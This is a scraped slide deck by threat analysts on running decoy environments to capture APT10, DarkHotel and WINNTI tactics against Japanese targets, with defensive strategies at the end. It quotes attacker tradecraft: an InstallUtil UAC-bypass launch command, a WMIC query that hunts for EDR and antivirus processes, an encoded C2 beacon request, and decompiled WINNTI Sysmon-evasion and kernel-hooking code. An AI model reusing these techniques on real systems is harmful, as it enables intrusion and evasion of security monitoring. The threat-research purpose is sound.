catch painful ttps for adversaries · 2018. 12. 28. ·...
TRANSCRIPT
![Page 1: Catch Painful TTPs for Adversaries · 2018. 12. 28. · C:¥Windows¥Microsoft.NET¥Framework¥v4.0.30319¥InstallUtil.exe /LogFile= /LogToConsole=false /u C:¥users¥public¥appdata¥UninstallPersistSqlState.sql.man](https://reader033.vdocuments.net/reader033/viewer/2022060717/607d9318cad5987ab82b7d39/html5/thumbnails/1.jpg)
Catch Painful TTPs for Adversaries
Hiroshi TakeuchiHajime Yanagishita
![Page 2: Catch Painful TTPs for Adversaries · 2018. 12. 28. · C:¥Windows¥Microsoft.NET¥Framework¥v4.0.30319¥InstallUtil.exe /LogFile= /LogToConsole=false /u C:¥users¥public¥appdata¥UninstallPersistSqlState.sql.man](https://reader033.vdocuments.net/reader033/viewer/2022060717/607d9318cad5987ab82b7d39/html5/thumbnails/2.jpg)
2
Who are we?
• Hiroshi Takeuchi• Security field experience for over 5 years• A Member of Threat Analysis Team of Macnica Networks• Mission: Malware Analysis, Reverse Engineering
• Hajime Yanagishita • Security field experience for over 10 years• A Member of Threat Analysis Team of Macnica Networks• Cyber Threat Analyst with Geopolitical interest• Mission: Threat Hunting, IR, Malware Analysis
![Page 3: Catch Painful TTPs for Adversaries · 2018. 12. 28. · C:¥Windows¥Microsoft.NET¥Framework¥v4.0.30319¥InstallUtil.exe /LogFile= /LogToConsole=false /u C:¥users¥public¥appdata¥UninstallPersistSqlState.sql.man](https://reader033.vdocuments.net/reader033/viewer/2022060717/607d9318cad5987ab82b7d39/html5/thumbnails/3.jpg)
3
Contents• Background • To be Resilient in current situation• Adversaries’ TTPs Examples • Leverage the Collected TTPs• Takeaways
![Page 4: Catch Painful TTPs for Adversaries · 2018. 12. 28. · C:¥Windows¥Microsoft.NET¥Framework¥v4.0.30319¥InstallUtil.exe /LogFile= /LogToConsole=false /u C:¥users¥public¥appdata¥UninstallPersistSqlState.sql.man](https://reader033.vdocuments.net/reader033/viewer/2022060717/607d9318cad5987ab82b7d39/html5/thumbnails/4.jpg)
4
Background• Many Attack vectors• Spear Phishing• Social Engineering• Supply Chain Attack• Storage Device• Cloud Platform• etc
• Being Compromised HAPPENS (WHEN?)
![Page 5: Catch Painful TTPs for Adversaries · 2018. 12. 28. · C:¥Windows¥Microsoft.NET¥Framework¥v4.0.30319¥InstallUtil.exe /LogFile= /LogToConsole=false /u C:¥users¥public¥appdata¥UninstallPersistSqlState.sql.man](https://reader033.vdocuments.net/reader033/viewer/2022060717/607d9318cad5987ab82b7d39/html5/thumbnails/5.jpg)
5
Cyber Espionages Activity in Japan Actor(Tools) 18/04 18/05 18/06 18/07 18/08 18/09 18/10 18/11
Tick (XXMM/Datper)
WINNTI
Unknown (AmmyyAdmin)
APT10 (RedLeaves -zark20rk)
APT10 (ANEL)
APT10 (CobaltStrik / Quasar RAT)
BlackTech (PLEAD)
Taidoor (Taidoor / Tarent / Yalink)
DarkHotel
Group Targeted
Heavy Industry
Chemical,High-Tech
Chemical, High-Tech (Manufacturing)
Constructor
Think Tank
Think Tank Media Media
Defense Media
Politics
Media
High-Tech, Career
Manufacturing
Manufacturing
Unknown
![Page 6: Catch Painful TTPs for Adversaries · 2018. 12. 28. · C:¥Windows¥Microsoft.NET¥Framework¥v4.0.30319¥InstallUtil.exe /LogFile= /LogToConsole=false /u C:¥users¥public¥appdata¥UninstallPersistSqlState.sql.man](https://reader033.vdocuments.net/reader033/viewer/2022060717/607d9318cad5987ab82b7d39/html5/thumbnails/6.jpg)
6
To be Resilient: The Art of War, Sun Tzu
How we can stand in a more advantageous position?
If you know the enemy and know yourself,you need not fear the result of a hundred battles. If you know yourself but not the enemy, for every victory gained you will also suffer a defeat. If you know neither the enemy nor yourself, you will succumb in every battle.
![Page 7: Catch Painful TTPs for Adversaries · 2018. 12. 28. · C:¥Windows¥Microsoft.NET¥Framework¥v4.0.30319¥InstallUtil.exe /LogFile= /LogToConsole=false /u C:¥users¥public¥appdata¥UninstallPersistSqlState.sql.man](https://reader033.vdocuments.net/reader033/viewer/2022060717/607d9318cad5987ab82b7d39/html5/thumbnails/7.jpg)
7
Incubation• Proactive Adversaries’ TTPs Collection• Implant First Payload and Catch 2nd or Final Payload • Monitor Attackers’ Activity Remotely
• Not New, but Worth trying !
![Page 8: Catch Painful TTPs for Adversaries · 2018. 12. 28. · C:¥Windows¥Microsoft.NET¥Framework¥v4.0.30319¥InstallUtil.exe /LogFile= /LogToConsole=false /u C:¥users¥public¥appdata¥UninstallPersistSqlState.sql.man](https://reader033.vdocuments.net/reader033/viewer/2022060717/607d9318cad5987ab82b7d39/html5/thumbnails/8.jpg)
8
Incubation Decoy Environment (Simple)
Windows7 32bit
Windows7 64bit
Windows 2008
Domain Controller
CentOS 7
Client 1 Client 2
Server (internal)
Ubuntu13
FW ProxySquid
Virtual Machines
Internet
MonitorNW
![Page 9: Catch Painful TTPs for Adversaries · 2018. 12. 28. · C:¥Windows¥Microsoft.NET¥Framework¥v4.0.30319¥InstallUtil.exe /LogFile= /LogToConsole=false /u C:¥users¥public¥appdata¥UninstallPersistSqlState.sql.man](https://reader033.vdocuments.net/reader033/viewer/2022060717/607d9318cad5987ab82b7d39/html5/thumbnails/9.jpg)
9
• Sysmon, SysmonSearch [1]• ProcMon, Noriben [2]• EDR, Deception (If you already have)
Incubation
• Firewall (Prohibit outbound traffic to enterprise)• Isolated Network• Allow traffic to Internet
• Virtual Machine Environment• Prepare minimum Machines for Enterprise
• AD, File Server, Web Server, some EndpointsPlatform
Network
Monitoring
![Page 10: Catch Painful TTPs for Adversaries · 2018. 12. 28. · C:¥Windows¥Microsoft.NET¥Framework¥v4.0.30319¥InstallUtil.exe /LogFile= /LogToConsole=false /u C:¥users¥public¥appdata¥UninstallPersistSqlState.sql.man](https://reader033.vdocuments.net/reader033/viewer/2022060717/607d9318cad5987ab82b7d39/html5/thumbnails/10.jpg)
10
Not Always Success
Provocative Reply from Adversary..
![Page 11: Catch Painful TTPs for Adversaries · 2018. 12. 28. · C:¥Windows¥Microsoft.NET¥Framework¥v4.0.30319¥InstallUtil.exe /LogFile= /LogToConsole=false /u C:¥users¥public¥appdata¥UninstallPersistSqlState.sql.man](https://reader033.vdocuments.net/reader033/viewer/2022060717/607d9318cad5987ab82b7d39/html5/thumbnails/11.jpg)
11
Incubation Site Should be at Target Organization
DecoyEnvironment
Firewall
Internet
DMZ
Server
Client
DBWeb
MailAD File
MonitoringAttacker Commands
Network TrafficAdditional Tools
Lateral Movement Objectives ...
MailAD File
DBWeb
![Page 12: Catch Painful TTPs for Adversaries · 2018. 12. 28. · C:¥Windows¥Microsoft.NET¥Framework¥v4.0.30319¥InstallUtil.exe /LogFile= /LogToConsole=false /u C:¥users¥public¥appdata¥UninstallPersistSqlState.sql.man](https://reader033.vdocuments.net/reader033/viewer/2022060717/607d9318cad5987ab82b7d39/html5/thumbnails/12.jpg)
12
APT10
APT10
![Page 13: Catch Painful TTPs for Adversaries · 2018. 12. 28. · C:¥Windows¥Microsoft.NET¥Framework¥v4.0.30319¥InstallUtil.exe /LogFile= /LogToConsole=false /u C:¥users¥public¥appdata¥UninstallPersistSqlState.sql.man](https://reader033.vdocuments.net/reader033/viewer/2022060717/607d9318cad5987ab82b7d39/html5/thumbnails/13.jpg)
13
A case of Attack Overview
(1)Download
(2)Run(3)Drop
(4)Download Beaconin Memory
RTF Download Site
C2 Server1
C2 Server2
(5)Download Quasar RAT
![Page 14: Catch Painful TTPs for Adversaries · 2018. 12. 28. · C:¥Windows¥Microsoft.NET¥Framework¥v4.0.30319¥InstallUtil.exe /LogFile= /LogToConsole=false /u C:¥users¥public¥appdata¥UninstallPersistSqlState.sql.man](https://reader033.vdocuments.net/reader033/viewer/2022060717/607d9318cad5987ab82b7d39/html5/thumbnails/14.jpg)
14
Exploit: Macro
Creates Schedule Task as persistence
Downloads additional file
![Page 15: Catch Painful TTPs for Adversaries · 2018. 12. 28. · C:¥Windows¥Microsoft.NET¥Framework¥v4.0.30319¥InstallUtil.exe /LogFile= /LogToConsole=false /u C:¥users¥public¥appdata¥UninstallPersistSqlState.sql.man](https://reader033.vdocuments.net/reader033/viewer/2022060717/607d9318cad5987ab82b7d39/html5/thumbnails/15.jpg)
15
Exploit: Macro
DLL Side-Loading
![Page 16: Catch Painful TTPs for Adversaries · 2018. 12. 28. · C:¥Windows¥Microsoft.NET¥Framework¥v4.0.30319¥InstallUtil.exe /LogFile= /LogToConsole=false /u C:¥users¥public¥appdata¥UninstallPersistSqlState.sql.man](https://reader033.vdocuments.net/reader033/viewer/2022060717/607d9318cad5987ab82b7d39/html5/thumbnails/16.jpg)
16
.NET Launcher
tok.exe bypassuacC:¥Windows¥Microsoft.NET¥Framework¥v4.0.30319¥InstallUtil.exe/LogFile= /LogToConsole=false /u C:¥users¥public¥appdata¥UninstallPersistSqlState.sql.man
tok.exe = tokenvator [3]: Open Tool for Red Teaming
InstallUtil technique was observed in the other incident on January 2018 [4]
![Page 17: Catch Painful TTPs for Adversaries · 2018. 12. 28. · C:¥Windows¥Microsoft.NET¥Framework¥v4.0.30319¥InstallUtil.exe /LogFile= /LogToConsole=false /u C:¥users¥public¥appdata¥UninstallPersistSqlState.sql.man](https://reader033.vdocuments.net/reader033/viewer/2022060717/607d9318cad5987ab82b7d39/html5/thumbnails/17.jpg)
17
UninstallPersistSqlState.sql.manObfuscated by ConfuserEx
![Page 18: Catch Painful TTPs for Adversaries · 2018. 12. 28. · C:¥Windows¥Microsoft.NET¥Framework¥v4.0.30319¥InstallUtil.exe /LogFile= /LogToConsole=false /u C:¥users¥public¥appdata¥UninstallPersistSqlState.sql.man](https://reader033.vdocuments.net/reader033/viewer/2022060717/607d9318cad5987ab82b7d39/html5/thumbnails/18.jpg)
18
UIAutomationTypes.dll.uninstallUninstallPersistSqlState.sql.man loads this file (AES Encrypted)
Decrypted Code in memory
Quasar RAT
![Page 19: Catch Painful TTPs for Adversaries · 2018. 12. 28. · C:¥Windows¥Microsoft.NET¥Framework¥v4.0.30319¥InstallUtil.exe /LogFile= /LogToConsole=false /u C:¥users¥public¥appdata¥UninstallPersistSqlState.sql.man](https://reader033.vdocuments.net/reader033/viewer/2022060717/607d9318cad5987ab82b7d39/html5/thumbnails/19.jpg)
19
NGAV, EDR?
WMIC Process Where "Caption Like '%hpe%' OR Caption Like '%tan%' OR Caption Like '%sysmon%' OR Caption Like '%endpoint%' OR Caption Like '%falcon%' OR Caption Like '%cb.exe' OR Caption Like '%almon.exe' OR Caption Like '%cylance%' OR Caption Like '%avguix%' OR Caption Like '%ragent%' OR Caption Like '%xagt%' OR Caption Like '%defend%' OR Caption Like '%sgnmaster%' OR Caption Like '%swc_%' OR Caption Like '%swi_%' OR Caption Like '%SAVAdminService%' OR Caption Like '%SISI%'" Get Caption,ExecutablePath
![Page 20: Catch Painful TTPs for Adversaries · 2018. 12. 28. · C:¥Windows¥Microsoft.NET¥Framework¥v4.0.30319¥InstallUtil.exe /LogFile= /LogToConsole=false /u C:¥users¥public¥appdata¥UninstallPersistSqlState.sql.man](https://reader033.vdocuments.net/reader033/viewer/2022060717/607d9318cad5987ab82b7d39/html5/thumbnails/20.jpg)
20
DarkHotel
DarkHotel
![Page 21: Catch Painful TTPs for Adversaries · 2018. 12. 28. · C:¥Windows¥Microsoft.NET¥Framework¥v4.0.30319¥InstallUtil.exe /LogFile= /LogToConsole=false /u C:¥users¥public¥appdata¥UninstallPersistSqlState.sql.man](https://reader033.vdocuments.net/reader033/viewer/2022060717/607d9318cad5987ab82b7d39/html5/thumbnails/21.jpg)
21
Matryoshka Attack
lnk1st Downloader
3nd Downloader
spec.txt
help.txt2nd Downloader ace32/64.bmp
To be continued..
qmgj.db scrobi.db
mshta.exe
msvsmon.db
????.bmp
![Page 22: Catch Painful TTPs for Adversaries · 2018. 12. 28. · C:¥Windows¥Microsoft.NET¥Framework¥v4.0.30319¥InstallUtil.exe /LogFile= /LogToConsole=false /u C:¥users¥public¥appdata¥UninstallPersistSqlState.sql.man](https://reader033.vdocuments.net/reader033/viewer/2022060717/607d9318cad5987ab82b7d39/html5/thumbnails/22.jpg)
22
qmjg.db
Registered as COM in-process server (DLL). = COM Hijacking This file just launches another DLL “scrobi.db”
![Page 23: Catch Painful TTPs for Adversaries · 2018. 12. 28. · C:¥Windows¥Microsoft.NET¥Framework¥v4.0.30319¥InstallUtil.exe /LogFile= /LogToConsole=false /u C:¥users¥public¥appdata¥UninstallPersistSqlState.sql.man](https://reader033.vdocuments.net/reader033/viewer/2022060717/607d9318cad5987ab82b7d39/html5/thumbnails/23.jpg)
23
scrobi.db
Code similarity of OS Check with 360 Security’s DarkHotel Research Report [5]
![Page 24: Catch Painful TTPs for Adversaries · 2018. 12. 28. · C:¥Windows¥Microsoft.NET¥Framework¥v4.0.30319¥InstallUtil.exe /LogFile= /LogToConsole=false /u C:¥users¥public¥appdata¥UninstallPersistSqlState.sql.man](https://reader033.vdocuments.net/reader033/viewer/2022060717/607d9318cad5987ab82b7d39/html5/thumbnails/24.jpg)
24
scrobi.db thread workersThread Function
1 Access http://www.msn.comIf not, sleep 30 sec. If yes, kick another thread to run by SetEvent()User-Agent: check
2 Get the compromised host info and creates download bitmap file name in Thread 5.3 Access http://c.<redacted>.com/11759459/0/2b564fc0/0/
User-Agent: myagent%AppData%¥Microsoft¥Windows¥Themes¥1.0¥msvsmons.log
4 Check if the following directory exists %AppData%¥Microsoft¥Windows¥Themes¥1.0¥
5 Access http://www.<redacted>.jp/devsale42/????.bmpUser-Agent: main
6 Load the following file by LoadLibrary()%AppData%¥Microsoft¥Windows¥Themes¥1.0¥msvsmon.db
![Page 25: Catch Painful TTPs for Adversaries · 2018. 12. 28. · C:¥Windows¥Microsoft.NET¥Framework¥v4.0.30319¥InstallUtil.exe /LogFile= /LogToConsole=false /u C:¥users¥public¥appdata¥UninstallPersistSqlState.sql.man](https://reader033.vdocuments.net/reader033/viewer/2022060717/607d9318cad5987ab82b7d39/html5/thumbnails/25.jpg)
25
Misuse Legitimate Web Analytics Service
GET /11759459/0/2b564fc0/0/ HTTP/1.1User-Agent: myagentReferer:<04part2_00>iBIGf;Fn]vJAv#1~O¥1BFs`:4,fYi=zO=0D]xQbajj(ifbzg¥X-.L";(<oz9g'I`ITD{X#_^?gf).M0Aes@5zd?sZt<~,od'A5=r2,HnqqHJy`<NVy6<Al8.p@Y?$l?AP^b@Ene~@b5A'8YafMG1{I{FA¥9Zk/i8Host: c.<redacted>.com
![Page 26: Catch Painful TTPs for Adversaries · 2018. 12. 28. · C:¥Windows¥Microsoft.NET¥Framework¥v4.0.30319¥InstallUtil.exe /LogFile= /LogToConsole=false /u C:¥users¥public¥appdata¥UninstallPersistSqlState.sql.man](https://reader033.vdocuments.net/reader033/viewer/2022060717/607d9318cad5987ab82b7d39/html5/thumbnails/26.jpg)
26
Final Payload ?
Call UuidCreateSequential to get MAC address and use it to make download bmp file name
= Only target can download
![Page 27: Catch Painful TTPs for Adversaries · 2018. 12. 28. · C:¥Windows¥Microsoft.NET¥Framework¥v4.0.30319¥InstallUtil.exe /LogFile= /LogToConsole=false /u C:¥users¥public¥appdata¥UninstallPersistSqlState.sql.man](https://reader033.vdocuments.net/reader033/viewer/2022060717/607d9318cad5987ab82b7d39/html5/thumbnails/27.jpg)
27
WINNTI
![Page 28: Catch Painful TTPs for Adversaries · 2018. 12. 28. · C:¥Windows¥Microsoft.NET¥Framework¥v4.0.30319¥InstallUtil.exe /LogFile= /LogToConsole=false /u C:¥users¥public¥appdata¥UninstallPersistSqlState.sql.man](https://reader033.vdocuments.net/reader033/viewer/2022060717/607d9318cad5987ab82b7d39/html5/thumbnails/28.jpg)
28
Matryoshka Unique DLL Loading Chain
IIS Process
1. mpr.dll: One Export function is patched and loads cgi64.dll
2. cgi64.dll decodes codes by XOR 0x36 for preparing batch file to start another DLLrundll32 w3cutils.dll, #28
3. w3cutils.dll gets Computer Nameand ProductId, these string values are used for AES Decryption of WINNTI payload.
4. Decrypted WINNTI Payload is Injected into svchost.exe
![Page 29: Catch Painful TTPs for Adversaries · 2018. 12. 28. · C:¥Windows¥Microsoft.NET¥Framework¥v4.0.30319¥InstallUtil.exe /LogFile= /LogToConsole=false /u C:¥users¥public¥appdata¥UninstallPersistSqlState.sql.man](https://reader033.vdocuments.net/reader033/viewer/2022060717/607d9318cad5987ab82b7d39/html5/thumbnails/29.jpg)
29
Sysmon Check• Check Sysmon.exe Running• If yes, filters sysmon event writing.
__int64 SysmonChk_OpenProc_WriteF__(){
unsigned int v0; // ebx__int64 v1; // rbx
if ( (unsigned int)GetVersionEX__() < 4 )return 0i64;
v0 = Sysmoncheck__((__int64)"sysmon.exe", 0);
if ( v0 ){
if ( !(unsigned int)OpenEventCloseHandle__((__int64)"Global¥¥BFE_Notify_Event_{65a097fe-6102-446a-9f9c-55dfc3f411016}") )WriteFBySwith_OpenProc_CreateThread____(v0, (__int64)qword_225BC80, (unsigned __int64)&unk_16000, 0i64, 0, 1u);
v1 = CreateEvent1__((__int64)"Global¥¥BFE_Notify_Event_{65a097fe-6102-446a-9f9c-55dfc3f411014}");kernel32_Sleep(5000i64);if ( v1 )((void (__fastcall *)(__int64))kernel32_CloseHandle)(v1);
}return 0i64;
}
__int64 __fastcall OpenEventCloseHandle__(__int64 BFE_Event__){
__int64 handle0; // rax
handle0 = kernel32_OpenEventA(1i64, 0i64, BFE_Event__);if ( handle0 ){
((void (__fastcall *)(__int64))kernel32_CloseHandle)(handle0);handle0 = 1i64;
}return handle0;
}
![Page 30: Catch Painful TTPs for Adversaries · 2018. 12. 28. · C:¥Windows¥Microsoft.NET¥Framework¥v4.0.30319¥InstallUtil.exe /LogFile= /LogToConsole=false /u C:¥users¥public¥appdata¥UninstallPersistSqlState.sql.man](https://reader033.vdocuments.net/reader033/viewer/2022060717/607d9318cad5987ab82b7d39/html5/thumbnails/30.jpg)
30
WINNTI RAT Identificationif ( v2 > 3 ){
v4 = 40960; //Sizev5 = &MZ01; // Driver for 7 or above x64
}else{
v4 = 22016; //Sizev5 = &MZ02; // Driver for 2003 or below
}My_Create_WriteFile(v5, v4, v9);My_Load_Driver(( int64)v9, ( int64)&v7); // RegCreateKey(%Service), NtLoadDriver(), RegDeleteKey()kernel32_SetFileAttributesA(v9, 128);kernel32_DeleteFileA(v9);
v2 = sub_18003EA40(a1);if ( v2 ){
if ( v3 != 16 || (v4 = *(_BYTE *)(v1 + 1)) != 0 && v4 != 2 || v1 & 3 ){My_Failed((__int64)"A at L %d¥n", 564i64); //Failure Debug Msg?sub_18002785C(0i64);
}
![Page 31: Catch Painful TTPs for Adversaries · 2018. 12. 28. · C:¥Windows¥Microsoft.NET¥Framework¥v4.0.30319¥InstallUtil.exe /LogFile= /LogToConsole=false /u C:¥users¥public¥appdata¥UninstallPersistSqlState.sql.man](https://reader033.vdocuments.net/reader033/viewer/2022060717/607d9318cad5987ab82b7d39/html5/thumbnails/31.jpg)
31
WINNTI Kernel Driver• Dropped by RAT module (in svchost.exe)• Uses ¥¥Device¥¥NULL to communicate with RAT module• Kernel Driver is Packet Capturing Base
v5 = a3;v6 = a1;v7 = a4;v8 = a2;nullhandl0 = CreateFileA("¥¥¥¥.¥¥Nul", 3221225472i64, 3i64, 0i64, 3, 64, 0i64);if ( nullhandl0 == -1 )
return 0i64;if ( v5 ){
LODWORD(v11) = v7;result = DeviceIoControl(nullhandl0, &DeviceIoCtrl_Arg02, v6, v8, v5, v11,
a5, 0i64);}
WINNTI RAT
...{
RtlInitUnicodeString(&DestinationString, L"¥¥Device¥¥Null");
v1 = IoGetDeviceObjectPointer(&DestinationString, 1u, (PFILE_OBJECT *)&Object, &DeviceObject);
if ( (v1 & 0x80000000) == 0 ){
DrvObj0 = DeviceObject->DriverObject;if ( DrvObj0 ){qword_14000A228 = (__int64 (*)(void))DrvObj0->MajorFunction[14];DrvObj0->MajorFunction[14] =
(PDRIVER_DISPATCH)Probe4ReadWrite_IofCompleteIRP;result = v1;
}...
WINNTI Kernel Driver
![Page 32: Catch Painful TTPs for Adversaries · 2018. 12. 28. · C:¥Windows¥Microsoft.NET¥Framework¥v4.0.30319¥InstallUtil.exe /LogFile= /LogToConsole=false /u C:¥users¥public¥appdata¥UninstallPersistSqlState.sql.man](https://reader033.vdocuments.net/reader033/viewer/2022060717/607d9318cad5987ab82b7d39/html5/thumbnails/32.jpg)
32
WINNTI Kernel Driver with Payload in Userland
Public Server
Capturing Packet on Existing LISTENING PORT
WINNTI Magic Packet
WINNTI Network Driver is Digitally Signed Mostly with Other Victim Certificate
![Page 33: Catch Painful TTPs for Adversaries · 2018. 12. 28. · C:¥Windows¥Microsoft.NET¥Framework¥v4.0.30319¥InstallUtil.exe /LogFile= /LogToConsole=false /u C:¥users¥public¥appdata¥UninstallPersistSqlState.sql.man](https://reader033.vdocuments.net/reader033/viewer/2022060717/607d9318cad5987ab82b7d39/html5/thumbnails/33.jpg)
33
WINNTI Command & ControlCommand No. Function0 Bind Network Socket1 Check IP address change and Receive Packet, Console Output3 Console Output4 Read ¥¥DEV¥¥NULL and Console Output5 Check IP address change and Receive Packet, Console Output
![Page 34: Catch Painful TTPs for Adversaries · 2018. 12. 28. · C:¥Windows¥Microsoft.NET¥Framework¥v4.0.30319¥InstallUtil.exe /LogFile= /LogToConsole=false /u C:¥users¥public¥appdata¥UninstallPersistSqlState.sql.man](https://reader033.vdocuments.net/reader033/viewer/2022060717/607d9318cad5987ab82b7d39/html5/thumbnails/34.jpg)
34
WINNTI Long Persistence (VT sample Aug 2018)
![Page 35: Catch Painful TTPs for Adversaries · 2018. 12. 28. · C:¥Windows¥Microsoft.NET¥Framework¥v4.0.30319¥InstallUtil.exe /LogFile= /LogToConsole=false /u C:¥users¥public¥appdata¥UninstallPersistSqlState.sql.man](https://reader033.vdocuments.net/reader033/viewer/2022060717/607d9318cad5987ab82b7d39/html5/thumbnails/35.jpg)
35
WINNTI Long Persistence (VT samples Analysis)
0
200
400
600
800
1000
1200
A B C D E F G
Dwel
l Tim
e (D
ays)
WINNTI Listening Mode Samples on VT (First Submit earliest 2017-06-28, latest 2018-08-27)
avg. 778 Days ( 2 Years and 48 Days)
![Page 36: Catch Painful TTPs for Adversaries · 2018. 12. 28. · C:¥Windows¥Microsoft.NET¥Framework¥v4.0.30319¥InstallUtil.exe /LogFile= /LogToConsole=false /u C:¥users¥public¥appdata¥UninstallPersistSqlState.sql.man](https://reader033.vdocuments.net/reader033/viewer/2022060717/607d9318cad5987ab82b7d39/html5/thumbnails/36.jpg)
36
WINNTI Long Term Activity
Cloud Storage, MailWINNTI
C&C
Public ServerAccess by Stolen Account
WINNTIListening Mode
CMD.exeCMD.exe
WINNTI RATC&C
CMD.exe CMD.exe
Remote ControlUpload, Download
Remote ControlUpload, Download
CMD.exe CMD.exe
[6]
![Page 37: Catch Painful TTPs for Adversaries · 2018. 12. 28. · C:¥Windows¥Microsoft.NET¥Framework¥v4.0.30319¥InstallUtil.exe /LogFile= /LogToConsole=false /u C:¥users¥public¥appdata¥UninstallPersistSqlState.sql.man](https://reader033.vdocuments.net/reader033/viewer/2022060717/607d9318cad5987ab82b7d39/html5/thumbnails/37.jpg)
37
WINNTI Attack Activity
0 20 40 60 80 100 120 140 160 180at
find/findstripconfignbtstat
net accountsnet localgroup
net sessionnet share
net startnet timenet use
net usernet view
netstatping
quserreg
schtaskssysteminfo
tasklisttracert
whoami
The Number of Command Execution
Case A : Intrusion around Initial ReconnaissanceCase B : Intrusion around Data Stealing
![Page 38: Catch Painful TTPs for Adversaries · 2018. 12. 28. · C:¥Windows¥Microsoft.NET¥Framework¥v4.0.30319¥InstallUtil.exe /LogFile= /LogToConsole=false /u C:¥users¥public¥appdata¥UninstallPersistSqlState.sql.man](https://reader033.vdocuments.net/reader033/viewer/2022060717/607d9318cad5987ab82b7d39/html5/thumbnails/38.jpg)
38
AceHash (PW Dumper) : WINNTI • Custom Build AceHash Working With Command Line Decryption Key
![Page 39: Catch Painful TTPs for Adversaries · 2018. 12. 28. · C:¥Windows¥Microsoft.NET¥Framework¥v4.0.30319¥InstallUtil.exe /LogFile= /LogToConsole=false /u C:¥users¥public¥appdata¥UninstallPersistSqlState.sql.man](https://reader033.vdocuments.net/reader033/viewer/2022060717/607d9318cad5987ab82b7d39/html5/thumbnails/39.jpg)
39
Leverage the Collected TTPs
![Page 40: Catch Painful TTPs for Adversaries · 2018. 12. 28. · C:¥Windows¥Microsoft.NET¥Framework¥v4.0.30319¥InstallUtil.exe /LogFile= /LogToConsole=false /u C:¥users¥public¥appdata¥UninstallPersistSqlState.sql.man](https://reader033.vdocuments.net/reader033/viewer/2022060717/607d9318cad5987ab82b7d39/html5/thumbnails/40.jpg)
40
Defense Strategies based on TTPs
Delivery • Spear Phishing• Password Encrypted
Attachment
• Phishing Mail Training
Exploit • Macro Love!• Not Often 0-day Exploit• Steal Credentials of Cloud
Services (Email, Storage)
• Phishing Mail Training• Audit Authentication
Events• Implement Multifactor
Authentication
![Page 41: Catch Painful TTPs for Adversaries · 2018. 12. 28. · C:¥Windows¥Microsoft.NET¥Framework¥v4.0.30319¥InstallUtil.exe /LogFile= /LogToConsole=false /u C:¥users¥public¥appdata¥UninstallPersistSqlState.sql.man](https://reader033.vdocuments.net/reader033/viewer/2022060717/607d9318cad5987ab82b7d39/html5/thumbnails/41.jpg)
41
Defense Strategies based on TTPs
Installation, C2
• Difficult to Detect File Base by Obfuscation/Encryption (RAT is Only in Memory)
• Attacker Tends Not to Drop Final Payload except Real Intrusion (or Successful Incubation)
• Attacker Shows Some unique characteristics on C2 traffic (e.g. User-Agent)
• Memory Scanning and Analysis Tool (Detect RAT and Attacker Tools)
• Use C2 traffic characteristics to Monitor Attacker Activity
Lateral, Actions on Objectives
• Nature of RAT is remote command execution(e.g. whoami, net use, ping ...)
• PW Dumper Tools are used to steal Credentials for Lateral Movement
• EDR (Monitor and Record Attacker Activity)
![Page 42: Catch Painful TTPs for Adversaries · 2018. 12. 28. · C:¥Windows¥Microsoft.NET¥Framework¥v4.0.30319¥InstallUtil.exe /LogFile= /LogToConsole=false /u C:¥users¥public¥appdata¥UninstallPersistSqlState.sql.man](https://reader033.vdocuments.net/reader033/viewer/2022060717/607d9318cad5987ab82b7d39/html5/thumbnails/42.jpg)
42
Takeaways• Know YOUR Adversaries More
• Proactive TTPs collection is one of Keys to be Resilient• Incubation is One Effective Approach
• Use MITRE ATT&CK Framework to Find a Gap between Defense and Attack
• Local Intelligence + External Intelligence• Only target can get more TTPs
![Page 44: Catch Painful TTPs for Adversaries · 2018. 12. 28. · C:¥Windows¥Microsoft.NET¥Framework¥v4.0.30319¥InstallUtil.exe /LogFile= /LogToConsole=false /u C:¥users¥public¥appdata¥UninstallPersistSqlState.sql.man](https://reader033.vdocuments.net/reader033/viewer/2022060717/607d9318cad5987ab82b7d39/html5/thumbnails/44.jpg)
44
DarkHotel
MITRE ATT&CK
![Page 45: Catch Painful TTPs for Adversaries · 2018. 12. 28. · C:¥Windows¥Microsoft.NET¥Framework¥v4.0.30319¥InstallUtil.exe /LogFile= /LogToConsole=false /u C:¥users¥public¥appdata¥UninstallPersistSqlState.sql.man](https://reader033.vdocuments.net/reader033/viewer/2022060717/607d9318cad5987ab82b7d39/html5/thumbnails/45.jpg)
45
MITRE ATT&CK (APT10)
© 2018 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation.
![Page 46: Catch Painful TTPs for Adversaries · 2018. 12. 28. · C:¥Windows¥Microsoft.NET¥Framework¥v4.0.30319¥InstallUtil.exe /LogFile= /LogToConsole=false /u C:¥users¥public¥appdata¥UninstallPersistSqlState.sql.man](https://reader033.vdocuments.net/reader033/viewer/2022060717/607d9318cad5987ab82b7d39/html5/thumbnails/46.jpg)
46
MITRE ATT&CK (DarkHotel)
© 2018 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation.
![Page 47: Catch Painful TTPs for Adversaries · 2018. 12. 28. · C:¥Windows¥Microsoft.NET¥Framework¥v4.0.30319¥InstallUtil.exe /LogFile= /LogToConsole=false /u C:¥users¥public¥appdata¥UninstallPersistSqlState.sql.man](https://reader033.vdocuments.net/reader033/viewer/2022060717/607d9318cad5987ab82b7d39/html5/thumbnails/47.jpg)
47
MITRE ATT&CK (WINNTI)
© 2018 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation.
![Page 48: Catch Painful TTPs for Adversaries · 2018. 12. 28. · C:¥Windows¥Microsoft.NET¥Framework¥v4.0.30319¥InstallUtil.exe /LogFile= /LogToConsole=false /u C:¥users¥public¥appdata¥UninstallPersistSqlState.sql.man](https://reader033.vdocuments.net/reader033/viewer/2022060717/607d9318cad5987ab82b7d39/html5/thumbnails/48.jpg)
48
Reference1. https://github.com/JPCERTCC/SysmonSearch2. https://github.com/Rurik/Noriben3. https://github.com/0xbadjuju/Tokenvator4. https://www.crowdstrike.com/resources/reports/observations-from-the-front-lines-of-threat-hunting/5. https://ti.360.net/blog/articles/analyzing-attack-of-cve-2018-8373-and-darkhotel/
6. https://401trg.com/burning-umbrella/